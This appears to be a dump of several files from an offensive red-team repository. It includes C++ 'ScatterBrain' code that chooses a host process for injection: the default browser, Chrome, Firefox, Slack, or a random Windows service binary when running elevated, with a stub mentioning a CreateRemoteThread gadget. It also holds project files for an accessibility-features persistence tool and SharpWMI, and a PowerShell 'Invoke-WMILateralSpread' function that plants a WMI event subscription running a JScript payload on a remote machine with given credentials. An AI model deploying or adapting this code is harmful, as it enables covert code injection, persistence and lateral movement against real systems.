21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/ScatterBrain/ChatApplications.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "Helpers.h"
3 | #include "RegistryHelpers.h"
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 | wchar_t* GetSlackPath()
11 | {
12 | std::wstring slackVersionRegKey;
13 | slackVersionRegKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\slack";
14 |
15 | std::wstring regValue(L"DisplayVersion");
16 | std::wstring valueFromRegistry;
17 | try
18 | {
19 | valueFromRegistry = GetStringValueFromHKCU(slackVersionRegKey, regValue);
20 | }
21 | catch (std::exception& e)
22 | {
23 | return NULL;
24 | }
25 | size_t szSlackPath = sizeof(wchar_t) * MAX_PATH;
26 | wchar_t* slackPath = new wchar_t[szSlackPath];
27 | ZeroMemory(slackPath, szSlackPath);
28 | _wdupenv_s(&slackPath, &szSlackPath, L"LOCALAPPDATA");
29 | lstrcatW(slackPath, L"\\slack\\app-");
30 | lstrcatW(slackPath, valueFromRegistry.c_str());
31 | lstrcatW(slackPath, L"\\slack.exe");
32 | if (FileExistsAndIs64Bit(slackPath))
33 | {
34 | return slackPath;
35 | }
36 | delete(slackPath);
37 | return NULL;
38 | }
39 |
40 | wchar_t* GetSipApplicationPath()
41 | {
42 | std::wstring sipLauncher;
43 | sipLauncher = L"SOFTWARE\\Classes\\sip\\shell\\open\\command";
44 | std::wstring defaultKeyName(L"");
45 | std::wstring defaultKeyValue;
46 | try
47 | {
48 | defaultKeyValue = GetStringValueFromHKLM(sipLauncher, defaultKeyName);
49 | }
50 | catch (std::exception& e)
51 | {
52 | return NULL;
53 | }
54 | size_t szTempValue = lstrlenW(defaultKeyValue.c_str()) + 1;
55 | wchar_t* tempValue = new wchar_t[szTempValue];
56 | ZeroMemory(tempValue, szTempValue);
57 | wcscpy_s(tempValue, szTempValue, defaultKeyValue.c_str());
58 | wchar_t* buffer;
59 | wchar_t* parts = wcstok_s(tempValue, L"\"", &buffer);
60 | std::wstring wstrRetVal(parts);
61 | int i = 0;
62 | size_t index = wstrRetVal.find(L"\"", i);
63 | while (index < lstrlenW(wstrRetVal.c_str()))
64 | {
65 | wstrRetVal.replace(index, 1, L"");
66 | i += 1;
67 | index = wstrRetVal.find(L"\"", i);
68 | }
69 | rtrimws(wstrRetVal);
70 | size_t szRetVal = lstrlenW(wstrRetVal.c_str()) + 1;
71 | wchar_t* retVal = new wchar_t[szRetVal];
72 | ZeroMemory(retVal, szRetVal);
73 | wcscpy_s(retVal, szRetVal, wstrRetVal.c_str());
74 | delete(tempValue);
75 | if (FileExistsAndIs64Bit(retVal))
76 | {
77 | return retVal;
78 | }
79 | delete(retVal);
80 | return NULL;
81 | }
82 |
83 | wchar_t* GetChatApplication()
84 | {
85 | wchar_t* slackPath = GetSlackPath();
86 | if (slackPath != NULL)
87 | {
88 | return slackPath;
89 | }
90 |
91 | wchar_t* defaultSipApp = GetSipApplicationPath();
92 | if (defaultSipApp != NULL)
93 | {
94 | return defaultSipApp;
95 | }
96 |
97 | return NULL;
98 | }
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/AccessibilityFeaturesPersistence.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}
8 | Exe
9 | AccessibilityFeaturesPersistence
10 | AccessibilityFeaturesPersistence
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | True
48 | True
49 | Resources.resx
50 |
51 |
52 |
53 |
54 | ResXFileCodeGenerator
55 | Resources.Designer.cs
56 |
57 |
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace SharpWMI.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SharpWMI.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 |
63 | ///
64 | /// Looks up a localized resource of type System.Byte[].
65 | ///
66 | internal static byte[] ScatterBrain {
67 | get {
68 | object obj = ResourceManager.GetObject("ScatterBrain", resourceCulture);
69 | return ((byte[])(obj));
70 | }
71 | }
72 | }
73 | }
74 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace AccessibilityFeaturesPersistence.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AccessibilityFeaturesPersistence.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 |
63 | ///
64 | /// Looks up a localized resource of type System.Byte[].
65 | ///
66 | internal static byte[] ScatterBrain {
67 | get {
68 | object obj = ResourceManager.GetObject("ScatterBrain", resourceCulture);
69 | return ((byte[])(obj));
70 | }
71 | }
72 | }
73 | }
74 |
--------------------------------------------------------------------------------
/ScatterBrain/ScatterBrain.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 | Header Files
44 |
45 |
46 | Header Files
47 |
48 |
49 | Header Files
50 |
51 |
52 | Header Files
53 |
54 |
55 | Header Files
56 |
57 |
58 | Header Files
59 |
60 |
61 |
62 |
63 | Source Files
64 |
65 |
66 | Source Files
67 |
68 |
69 | Source Files
70 |
71 |
72 | Source Files
73 |
74 |
75 | Source Files
76 |
77 |
78 | Source Files
79 |
80 |
81 | Source Files
82 |
83 |
84 | Source Files
85 |
86 |
87 | Source Files
88 |
89 |
90 | Source Files
91 |
92 |
93 | Source Files
94 |
95 |
96 | Source Files
97 |
98 |
99 | Source Files
100 |
101 |
102 |
--------------------------------------------------------------------------------
/ScatterBrain/Browsers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "RegistryHelpers.h"
3 | #include "Helpers.h"
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 |
12 | wchar_t* GetGoogleChromePath()
13 | {
14 | char* path;
15 | DWORD sz = sizeof(char) * MAX_PATH;
16 | char* chromeExePath = (char*)malloc(sz);
17 | size_t len;
18 | _dupenv_s(&path, &len, "PROGRAMFILES(x86)");
19 | char cToStr[] = "\\Google\\Chrome\\Application\\chrome.exe";
20 | strcpy_s(chromeExePath, sz, path);
21 | free(path);
22 | strcat_s(chromeExePath, sz, cToStr);
23 | wchar_t* result = CharToWcharT(chromeExePath);
24 | free(chromeExePath);
25 | if (FileExistsAndIs64Bit(result))
26 | {
27 | return result;
28 | }
29 | delete(result);
30 | return NULL;
31 | }
32 |
33 | wchar_t* GetGoogleChromeSxSPath()
34 | {
35 | DWORD sz = sizeof(char) * MAX_PATH;
36 | char* path;
37 | char* chromeExePath = (char*)malloc(sz);
38 | size_t len;
39 | _dupenv_s(&path, &len, "LOCALAPPDATA");
40 | char cToStr[] = "\\Google\\Chrome SxS\\Application\\chrome.exe";
41 | strcpy_s(chromeExePath, sz, path);
42 | free(path);
43 | strcat_s(chromeExePath, sz, cToStr);
44 |
45 | wchar_t* result = CharToWcharT(chromeExePath);
46 | free(chromeExePath);
47 | if (FileExistsAndIs64Bit(result))
48 | {
49 | return result;
50 | }
51 | delete(result);
52 | return NULL;
53 | }
54 |
55 |
56 | wchar_t* GetFireFoxPath()
57 | {
58 | DWORD sz = sizeof(char) * MAX_PATH;
59 | char* firefoxExePath = (char*)malloc(sz);
60 | char* path;
61 | size_t len;
62 | char ffPath[] = "\\Mozilla Firefox\\firefox.exe";
63 | _dupenv_s(&path, &len, "PROGRAMFILES");
64 | strcpy_s(firefoxExePath, sz, path);
65 | free(path);
66 | strcat_s(firefoxExePath, sz, ffPath);
67 |
68 | wchar_t* result = CharToWcharT(firefoxExePath);
69 | free(firefoxExePath);
70 | if (FileExistsAndIs64Bit(result))
71 | {
72 | return result;
73 | }
74 | delete(result);
75 | return NULL;
76 | }
77 |
78 |
79 | wchar_t* GetDefaultBrowser()
80 | {
81 | std::wstring regSubKey;
82 | regSubKey = L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\URLAssociations\\https\\UserChoice";
83 | std::wstring regValue(L"ProgId");
84 | std::wstring valueFromRegistry;
85 | try
86 | {
87 | valueFromRegistry = GetStringValueFromHKCU(regSubKey, regValue);
88 | }
89 | catch (std::exception& e)
90 | {
91 | return NULL;
92 | }
93 | const wchar_t* openCommand = L"\\shell\\open\\command";
94 | size_t szTemp = lstrlenW(valueFromRegistry.c_str()) + lstrlenW(openCommand) + 1;
95 | wchar_t* temp = new wchar_t[szTemp];
96 | ZeroMemory(temp, szTemp);
97 | wcscpy_s(temp, szTemp, valueFromRegistry.c_str());
98 | wcscat_s(temp, szTemp, openCommand);
99 |
100 | std::wstring hkcrRegSubKey(temp);
101 | delete(temp);
102 | std::wstring hkcrRegValue(L"");
103 | std::wstring hkcrValueFromRegistry;
104 | try
105 | {
106 | hkcrValueFromRegistry = GetStringValueFromHKCR(hkcrRegSubKey, hkcrRegValue);
107 | }
108 | catch (std::exception& e)
109 | {
110 | return NULL;
111 | }
112 | size_t szTempValue = lstrlenW(hkcrValueFromRegistry.c_str()) + 1;
113 | wchar_t* tempValue = new wchar_t[szTempValue];
114 | ZeroMemory(tempValue, szTempValue);
115 | wcscpy_s(tempValue, szTempValue, hkcrValueFromRegistry.c_str());
116 | wchar_t* buffer;
117 | wchar_t* parts = wcstok_s(tempValue, L"\"", &buffer);
118 | std::wstring wstrRetVal(parts);
119 | int i = 0;
120 | size_t index = wstrRetVal.find(L"\"", i);
121 |
122 | // remove quotes and whitespace
123 | while (index < lstrlenW(wstrRetVal.c_str()))
124 | {
125 | wstrRetVal.replace(index, 1, L"");
126 | i += 1;
127 | index = wstrRetVal.find(L"\"", i);
128 | }
129 | rtrimws(wstrRetVal);
130 |
131 | size_t szRetVal = lstrlenW(wstrRetVal.c_str()) + 1;
132 | wchar_t* retVal = new wchar_t[szRetVal];
133 | ZeroMemory(retVal, szRetVal);
134 | wcscpy_s(retVal, szRetVal, wstrRetVal.c_str());
135 | delete(tempValue);
136 | if (FileExistsAndIs64Bit(retVal))
137 | {
138 | return retVal;
139 | }
140 | delete(retVal);
141 | return NULL;
142 | }
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/SharpWMI.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}
8 | Exe
9 | Properties
10 | SharpWMI
11 | SharpWMI
12 | v3.5
13 | 512
14 |
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 | AnyCPU
33 | true
34 | full
35 | false
36 | bin\Debug\
37 | DEBUG;TRACE
38 | prompt
39 | 4
40 |
41 |
42 | AnyCPU
43 | none
44 | true
45 | bin\Release\
46 |
47 |
48 | prompt
49 | 4
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 | True
65 | True
66 | Resources.resx
67 |
68 |
69 |
70 |
71 | ResXFileCodeGenerator
72 | Resources.Designer.cs
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 | False
84 | .NET Framework 3.5 SP1
85 | false
86 |
87 |
88 |
89 |
96 |
--------------------------------------------------------------------------------
/ScatterBrain/RegistryHelpers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | /*! \brief Returns a value from HKLM as string.
8 | \exception std::runtime_error Replace with your error handling.
9 | */
10 | std::wstring GetStringValueFromHKCU(const std::wstring& regSubKey, const std::wstring& regValue)
11 | {
12 | size_t bufferSize = 0xFFF; // If too small, will be resized down below.
13 | std::wstring valueBuf; // Contiguous buffer since C++11.
14 | valueBuf.resize(bufferSize);
15 | auto cbData = static_cast(bufferSize);
16 | auto rc = RegGetValueW(
17 | HKEY_CURRENT_USER,
18 | regSubKey.c_str(),
19 | regValue.c_str(),
20 | RRF_RT_REG_SZ,
21 | nullptr,
22 | static_cast(&valueBuf.at(0)),
23 | &cbData
24 | );
25 | while (rc == ERROR_MORE_DATA)
26 | {
27 | // Get a buffer that is big enough.
28 | cbData /= sizeof(wchar_t);
29 | if (cbData > static_cast(bufferSize))
30 | {
31 | bufferSize = static_cast(cbData);
32 | }
33 | else
34 | {
35 | bufferSize *= 2;
36 | cbData = static_cast(bufferSize);
37 | }
38 | valueBuf.resize(bufferSize);
39 | rc = RegGetValueW(
40 | HKEY_LOCAL_MACHINE,
41 | regSubKey.c_str(),
42 | regValue.c_str(),
43 | RRF_RT_REG_SZ,
44 | nullptr,
45 | static_cast(&valueBuf.at(0)),
46 | &cbData
47 | );
48 | }
49 | if (rc == ERROR_SUCCESS)
50 | {
51 | valueBuf.resize(static_cast(cbData / sizeof(wchar_t)));
52 | return valueBuf;
53 | }
54 | else
55 | {
56 | throw std::runtime_error("Windows system error code: " + std::to_string(rc));
57 | }
58 | }
59 |
60 | std::wstring GetStringValueFromHKCR(const std::wstring& regSubKey, const std::wstring& regValue)
61 | {
62 | size_t bufferSize = 0xFFF; // If too small, will be resized down below.
63 | std::wstring valueBuf; // Contiguous buffer since C++11.
64 | valueBuf.resize(bufferSize);
65 | auto cbData = static_cast(bufferSize);
66 | auto rc = RegGetValueW(
67 | HKEY_CLASSES_ROOT,
68 | regSubKey.c_str(),
69 | regValue.c_str(),
70 | RRF_RT_REG_SZ,
71 | nullptr,
72 | static_cast(&valueBuf.at(0)),
73 | &cbData
74 | );
75 | while (rc == ERROR_MORE_DATA)
76 | {
77 | // Get a buffer that is big enough.
78 | cbData /= sizeof(wchar_t);
79 | if (cbData > static_cast(bufferSize))
80 | {
81 | bufferSize = static_cast(cbData);
82 | }
83 | else
84 | {
85 | bufferSize *= 2;
86 | cbData = static_cast(bufferSize);
87 | }
88 | valueBuf.resize(bufferSize);
89 | rc = RegGetValueW(
90 | HKEY_LOCAL_MACHINE,
91 | regSubKey.c_str(),
92 | regValue.c_str(),
93 | RRF_RT_REG_SZ,
94 | nullptr,
95 | static_cast(&valueBuf.at(0)),
96 | &cbData
97 | );
98 | }
99 | if (rc == ERROR_SUCCESS)
100 | {
101 | valueBuf.resize(static_cast(cbData / sizeof(wchar_t)));
102 | return valueBuf;
103 | }
104 | else
105 | {
106 | throw std::runtime_error("Windows system error code: " + std::to_string(rc));
107 | }
108 | }
109 |
110 | std::wstring GetStringValueFromHKLM(const std::wstring& regSubKey, const std::wstring& regValue)
111 | {
112 | size_t bufferSize = 0xFFF; // If too small, will be resized down below.
113 | std::wstring valueBuf; // Contiguous buffer since C++11.
114 | valueBuf.resize(bufferSize);
115 | auto cbData = static_cast(bufferSize);
116 | auto rc = RegGetValueW(
117 | HKEY_LOCAL_MACHINE,
118 | regSubKey.c_str(),
119 | regValue.c_str(),
120 | RRF_RT_REG_SZ,
121 | nullptr,
122 | static_cast(&valueBuf.at(0)),
123 | &cbData
124 | );
125 | while (rc == ERROR_MORE_DATA)
126 | {
127 | // Get a buffer that is big enough.
128 | cbData /= sizeof(wchar_t);
129 | if (cbData > static_cast(bufferSize))
130 | {
131 | bufferSize = static_cast(cbData);
132 | }
133 | else
134 | {
135 | bufferSize *= 2;
136 | cbData = static_cast(bufferSize);
137 | }
138 | valueBuf.resize(bufferSize);
139 | rc = RegGetValueW(
140 | HKEY_LOCAL_MACHINE,
141 | regSubKey.c_str(),
142 | regValue.c_str(),
143 | RRF_RT_REG_SZ,
144 | nullptr,
145 | static_cast(&valueBuf.at(0)),
146 | &cbData
147 | );
148 | }
149 | if (rc == ERROR_SUCCESS)
150 | {
151 | valueBuf.resize(static_cast(cbData / sizeof(wchar_t)));
152 | return valueBuf;
153 | }
154 | else
155 | {
156 | throw std::runtime_error("Windows system error code: " + std::to_string(rc));
157 | }
158 | }
--------------------------------------------------------------------------------
/regfree_com_activation_templates/wmi.ps1:
--------------------------------------------------------------------------------
1 | function Invoke-WMILateralSpread {
2 | [CmdletBinding()]
3 | Param (
4 | [ValidateNotNullOrEmpty()]
5 | [String]
6 | $ComputerName = '.',
7 |
8 | [ValidatePattern('.*\.*')]
9 | [String]
10 | $UserName,
11 |
12 | [ValidateNotNullOrEmpty()]
13 | [String]
14 | $Password,
15 |
16 | [ValidateNotNullOrEmpty()]
17 | [String]
18 | $SpawnProcess = "rundll32.exe"
19 | )
20 |
21 |
22 | if ($PSBoundParameters['UserName']) {
23 | $SecPassword = ConvertTo-SecureString $PSBoundParameters['Password'] -AsPlainText -Force
24 | $Credential = New-Object System.Management.Automation.PSCredential($PSBoundParameters['UserName'], $SecPassword)
25 | }
26 |
27 | # set up a 30 second timer
28 | $TimerArg = @{
29 | IntervalBetweenEvents = ([UInt32] 30000)
30 | SkipIfPassed = $False
31 | TimerId = 'Timer'
32 | }
33 |
34 | $Arguments = @{
35 | Namespace = 'ROOT\cimv2'
36 | Class = '__IntervalTimerInstruction'
37 | ComputerName = $ComputerName
38 | Arguments = $TimerArg
39 | ErrorAction = 'Stop'
40 | }
41 |
42 | if ($Credential) { $Arguments['Credential'] = $Credential }
43 | Write-Verbose "Installing timer with name 'Timer' on $ComputerName"
44 | $Timer = Set-WmiInstance @Arguments
45 |
46 |
47 | # set up the timer filter
48 | $Trigger = @{
49 | Name = 'Updater'
50 | EventNameSpace = 'ROOT\cimv2'
51 | QueryLanguage = 'WQL'
52 | Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'"
53 | }
54 |
55 | $FilterParams = @{
56 | Namespace = 'root\subscription'
57 | Class = '__EventFilter'
58 | ComputerName = $ComputerName
59 | Arguments = $Trigger
60 | ErrorAction = 'Stop'
61 | }
62 |
63 | if ($Credential) { $FilterParams['Credential'] = $Credential }
64 | Write-Verbose "Installing event filter 'Updater' for the timer on $ComputerName"
65 | $Filter = Set-WmiInstance @FilterParams
66 |
67 |
68 | # the actual payload used
69 | $JScript = @"
70 | JSCRIPT_FORMATTED_TEMPLATE_HERE
71 | "@
72 |
73 | $Action = @{
74 | Name = 'Updater'
75 | ScriptingEngine = 'JScript'
76 | ScriptText = $JScript
77 | KillTimeout = [UInt32] 45
78 | }
79 |
80 | $ConsumerParams = @{
81 | Namespace = 'root\subscription'
82 | Class = 'ActiveScriptEventConsumer'
83 | ComputerName = $ComputerName
84 | Arguments = $Action
85 | ErrorAction = 'Stop'
86 | }
87 |
88 | if ($Credential) { $ConsumerParams['Credential'] = $Credential }
89 | Write-Verbose "Installing event consumer 'Updater' on $ComputerName"
90 | $Consumer = Set-WmiInstance @ConsumerParams
91 |
92 |
93 | # bind it all together
94 | $BindingParams = @{
95 | Namespace = 'root\subscription'
96 | Class = '__FilterToConsumerBinding'
97 | ComputerName = $ComputerName
98 | Arguments = @{ Filter = $Filter; Consumer = $Consumer }
99 | ErrorAction = 'Stop'
100 | }
101 |
102 | if ($Credential) { $BindingParams['Credential'] = $Credential }
103 | Write-Verbose "Installing filter to consumer binding on $ComputerName"
104 | $FilterConsumerBinding = Set-WmiInstance @BindingParams
105 |
106 | $Result = New-Object PSObject -Property @{
107 | Filter = $Filter
108 | Consumer = $Consumer
109 | Binding = $FilterConsumerBinding
110 | }
111 |
112 |
113 | Write-Verbose "Waiting 45 seconds for event to trigger on $ComputerName ..."
114 | Start-Sleep -Seconds 45
115 |
116 |
117 | $CleanupParams = @{
118 | ComputerName = $ComputerName
119 | }
120 | if ($Credential) { $CleanupParams['Credential'] = $Credential }
121 | Write-Verbose "Removing 'Timer' internal timer from $ComputerName"
122 | Get-WMIObject -Namespace root\cimv2 -Class __IntervalTimerInstruction @CleanupParams | ?{$_.TimerId -match 'Timer'} | Remove-WMIObject
123 |
124 | Write-Verbose "Removing filter to consumer binding from $ComputerName"
125 | Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding @CleanupParams | ?{$_.Filter -match 'Updater'} | Remove-WMIObject
126 |
127 | Write-Verbose "Removing event filter from $ComputerName"
128 | Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name LIKE 'Updater'" @CleanupParams | Remove-WMIObject
129 |
130 | Write-Verbose "Removing event consumer from $ComputerName"
131 | Get-WMIObject -Namespace root\Subscription -Class __EventConsumer @CleanupParams | ?{$_.Name -match 'Updater'} | Remove-WMIObject
132 |
133 | Write-Verbose "Cleanup completed on $ComputerName"
134 | }
135 |
--------------------------------------------------------------------------------
/ScatterBrain/Executables.cpp:
--------------------------------------------------------------------------------
1 | // FileChecker.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "WindowsSecurity.h"
6 | #include "Browsers.h"
7 | #include "ChatApplications.h"
8 | #include "Helpers.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | using namespace std;
15 |
16 |
17 | wchar_t* GetWindowsBinary()
18 | {
19 | DWORD sz = sizeof(char) * MAX_PATH;
20 | const int szBinaries = 7;
21 | const char* binaries[szBinaries] = {
22 | "\\splwow64.exe",
23 | "\\System32\\printfilterpipelinesvc.exe",
24 | "\\System32\\PrintIsolationHost.exe",
25 | "\\System32\\spoolsv.exe",
26 | "\\System32\\upnpcont.exe",
27 | "\\System32\\conhost.exe",
28 | "\\System32\\convertvhd.exe"
29 | };
30 |
31 | char* path;
32 | size_t szLen;
33 | _dupenv_s(&path, &szLen, "SYSTEMROOT");
34 |
35 | char* retBinary = (char*)malloc(sz);
36 | ZeroMemory(retBinary, sz);
37 | int i = 0;
38 | //struct _stat buffer;
39 | do
40 | {
41 | strcpy_s(retBinary, sz, path);
42 | srand(time(0));
43 | i = rand() % szBinaries;
44 | strcat_s(retBinary, sz, binaries[i]);
45 | if (FileExistsAndIs64Bit(retBinary))
46 | {
47 |
48 | printf("[*] Windows Binary: %s\n", retBinary);
49 | }
50 | else
51 | {
52 | ZeroMemory(retBinary, sz);
53 | }
54 | } while (retBinary == NULL);
55 | wchar_t* finalResult = CharToWcharT(retBinary);
56 | return finalResult;
57 | }
58 |
59 | wchar_t* GetValidExecutable()
60 | {
61 | // If not high integrity, find some applications
62 | // a user might use.
63 | if (!IsHighIntegrity())
64 | {
65 | // Try and get the default browser.
66 | wchar_t* defaultBrowser = GetDefaultBrowser();
67 |
68 | if (defaultBrowser == NULL)
69 | {
70 | // Otherwise, attempt to find default browser paths.
71 | wchar_t* chromePath = GetGoogleChromePath();
72 | if (chromePath != NULL)
73 | {
74 | return chromePath;
75 | }
76 |
77 | wchar_t* chromeSxSPath = GetGoogleChromeSxSPath();
78 | if (chromeSxSPath != NULL)
79 | {
80 | return chromeSxSPath;
81 | }
82 |
83 | wchar_t* firefoxPath = GetFireFoxPath();
84 | if (firefoxPath != NULL)
85 | {
86 | return firefoxPath;
87 | }
88 | }
89 | else
90 | {
91 | return defaultBrowser;
92 | }
93 | // We've failed to find a default browser.
94 | // Let's look for chat applications instead.
95 | wchar_t* chatApp = GetChatApplication();
96 | if (chatApp != NULL)
97 | {
98 | return chatApp;
99 | }
100 | }
101 |
102 | // If we can't find the above, or we're a high
103 | // integrity process (like running under SYSTEM)
104 | // then get a Windows binary to launch.
105 | wchar_t* windowsBinary = GetWindowsBinary();
106 | return windowsBinary;
107 | }
108 |
109 | // Helper function to find a jmp rcx gadget for CreateRemoteThread.
